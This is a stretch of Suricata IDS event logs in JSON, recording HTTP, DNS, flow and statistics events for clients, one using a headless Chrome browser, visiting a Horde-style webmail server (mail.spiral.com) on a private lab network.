{"timestamp":"2020-02-29T00:06:46.000415+0000","event_type":"stats","stats":{"uptime":14058,"capture":{"kernel_packets":133618,"kernel_drops":0},"decoder":{"pkts":133643,"bytes":92458310,"invalid":181,"ipv4":132188,"ipv6":8,"ethernet":133643,"raw":0,"null":0,"sll":0,"tcp":127078,"udp":4914,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2709,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2725,"synack":2716,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1752,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2241,"failed_udp":110},"tx":{"http":4538,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2318}},"flow_mgr":{"closed_pruned":2692,"new_pruned":15,"est_pruned":2286,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21164,"memcap_state":0,"memcap_global":0},"http":{"memuse":137984,"memcap":0}}} {"timestamp":"2020-02-29T00:06:47.067491+0000","flow_id":1874300828193260,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52694,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5273},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":25872,"tx_id":0}} {"timestamp":"2020-02-29T00:06:47.850714+0000","flow_id":2186244303009272,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34750,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6892},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35875,"tx_id":0}} {"timestamp":"2020-02-29T00:06:48.000500+0000","flow_id":1275784246733683,"event_type":"flow","src_ip":"192.168.10.81","src_port":52688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":12,"bytes_toserver":1664,"bytes_toclient":7838,"start":"2020-02-29T00:05:42.404339+0000","end":"2020-02-29T00:05:47.657846+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:48.001717+0000","flow_id":448856997904054,"event_type":"flow","src_ip":"192.168.10.122","src_port":56014,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:46.933558+0000","end":"2020-02-29T00:01:47.039247+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:48.002381+0000","flow_id":1377287193441638,"event_type":"flow","src_ip":"192.168.10.122","src_port":52259,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:47.144742+0000","end":"2020-02-29T00:01:47.250009+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:48.579771+0000","flow_id":1668915492608187,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58818,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48270,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:48.688271+0000","flow_id":1668915492608187,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58818,"proto":"UDP","dns":{"type":"answer","id":48270,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:48.688271+0000","flow_id":1668915492608187,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58818,"proto":"UDP","dns":{"type":"answer","id":48270,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:48.768128+0000","flow_id":117556125411825,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3981}} {"timestamp":"2020-02-29T00:06:53.000179+0000","event_type":"stats","stats":{"uptime":14065,"capture":{"kernel_packets":133655,"kernel_drops":0},"decoder":{"pkts":133665,"bytes":92464732,"invalid":181,"ipv4":132208,"ipv6":8,"ethernet":133665,"raw":0,"null":0,"sll":0,"tcp":127096,"udp":4916,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2710,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2726,"synack":2717,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1753,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2242,"failed_udp":110},"tx":{"http":4539,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2319}},"flow_mgr":{"closed_pruned":2693,"new_pruned":15,"est_pruned":2288,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20833,"memcap_state":0,"memcap_global":0},"http":{"memuse":52445,"memcap":0}}} {"timestamp":"2020-02-29T00:06:53.521339+0000","flow_id":117556125411825,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34752,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3981},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19150,"tx_id":0}} {"timestamp":"2020-02-29T00:06:53.530561+0000","flow_id":397725432354945,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45988,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36766,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:53.639563+0000","flow_id":397725432354945,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45988,"proto":"UDP","dns":{"type":"answer","id":36766,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:53.639563+0000","flow_id":397725432354945,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45988,"proto":"UDP","dns":{"type":"answer","id":36766,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:54.152239+0000","flow_id":117556125411825,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":19005}} {"timestamp":"2020-02-29T00:06:56.895861+0000","flow_id":459856429493109,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36544,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":3163,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:57.004740+0000","flow_id":459856429493109,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36544,"proto":"UDP","dns":{"type":"answer","id":3163,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:57.004740+0000","flow_id":459856429493109,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36544,"proto":"UDP","dns":{"type":"answer","id":3163,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:57.151550+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6131}} {"timestamp":"2020-02-29T00:06:59.002238+0000","flow_id":2074880077357107,"event_type":"flow","src_ip":"192.168.10.122","src_port":56903,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:58.221235+0000","end":"2020-02-29T00:01:58.332439+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:59.155554+0000","flow_id":117556125411825,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34752,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":19005},"app_proto":"http","fileinfo":{"filename":"\/turba\/add.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:07:00.000186+0000","event_type":"stats","stats":{"uptime":14072,"capture":{"kernel_packets":133702,"kernel_drops":0},"decoder":{"pkts":133714,"bytes":92495080,"invalid":181,"ipv4":132257,"ipv6":8,"ethernet":133714,"raw":0,"null":0,"sll":0,"tcp":127141,"udp":4920,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2711,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2727,"synack":2718,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1754,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2244,"failed_udp":110},"tx":{"http":4541,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2321}},"flow_mgr":{"closed_pruned":2693,"new_pruned":15,"est_pruned":2288,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21165,"memcap_state":0,"memcap_global":0},"http":{"memuse":188825,"memcap":0}}} {"timestamp":"2020-02-29T00:07:00.231216+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6131},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30702,"tx_id":0}} {"timestamp":"2020-02-29T00:07:00.242351+0000","flow_id":339717604553391,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55353,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12284,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:00.351112+0000","flow_id":339717604553391,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55353,"proto":"UDP","dns":{"type":"answer","id":12284,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:00.351112+0000","flow_id":339717604553391,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55353,"proto":"UDP","dns":{"type":"answer","id":12284,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:00.421380+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8383}} {"timestamp":"2020-02-29T00:07:00.708831+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8383},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":35100,"tx_id":1}} {"timestamp":"2020-02-29T00:07:00.719517+0000","flow_id":463232274070173,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40239,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6681,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:00.828093+0000","flow_id":463232274070173,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40239,"proto":"UDP","dns":{"type":"answer","id":6681,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:00.828093+0000","flow_id":463232274070173,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40239,"proto":"UDP","dns":{"type":"answer","id":6681,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:00.886477+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":885},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:07:00.886498+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":905}} {"timestamp":"2020-02-29T00:07:02.000817+0000","flow_id":1373619292299151,"event_type":"flow","src_ip":"192.168.10.122","src_port":34201,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:02:01.614287+0000","end":"2020-02-29T00:02:01.726419+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:02.000980+0000","flow_id":1385872834029786,"event_type":"flow","src_ip":"192.168.10.122","src_port":41614,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:01.583898+0000","end":"2020-02-29T00:02:01.695422+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:03.000661+0000","flow_id":1224077136164186,"event_type":"flow","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":13,"bytes_toserver":2729,"bytes_toclient":7411,"start":"2020-02-29T00:05:52.587098+0000","end":"2020-02-29T00:06:02.061403+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:03.001362+0000","flow_id":2245411754145674,"event_type":"flow","src_ip":"192.168.10.122","src_port":56001,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:02:02.063370+0000","end":"2020-02-29T00:02:02.174799+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:05.000870+0000","flow_id":1667395055547594,"event_type":"flow","src_ip":"192.168.10.122","src_port":59842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:04.750794+0000","end":"2020-02-29T00:02:04.861699+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:05.888042+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":905},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2334,"tx_id":2}} {"timestamp":"2020-02-29T00:07:06.000423+0000","flow_id":69813250355827,"event_type":"flow","src_ip":"192.168.10.122","src_port":45990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:04.979571+0000","end":"2020-02-29T00:02:05.090880+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:07.000175+0000","event_type":"stats","stats":{"uptime":14079,"capture":{"kernel_packets":133719,"kernel_drops":0},"decoder":{"pkts":133739,"bytes":92508417,"invalid":181,"ipv4":132282,"ipv6":8,"ethernet":133739,"raw":0,"null":0,"sll":0,"tcp":127162,"udp":4924,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2711,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2727,"synack":2718,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1754,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2246,"failed_udp":110},"tx":{"http":4543,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2323}},"flow_mgr":{"closed_pruned":2694,"new_pruned":15,"est_pruned":2292,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20174,"memcap_state":0,"memcap_global":0},"http":{"memuse":137002,"memcap":0}}} {"timestamp":"2020-02-29T00:07:08.048471+0000","flow_id":782648992382295,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48718,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61304,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:08.157035+0000","flow_id":782648992382295,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48718,"proto":"UDP","dns":{"type":"answer","id":61304,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:08.157035+0000","flow_id":782648992382295,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48718,"proto":"UDP","dns":{"type":"answer","id":61304,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:08.234197+0000","flow_id":322507671114127,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34756,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/add.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc&view=Contact","length":20}} {"timestamp":"2020-02-29T00:07:08.241765+0000","flow_id":20416851390565,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49564,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35492,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:08.350330+0000","flow_id":20416851390565,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49564,"proto":"UDP","dns":{"type":"answer","id":35492,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 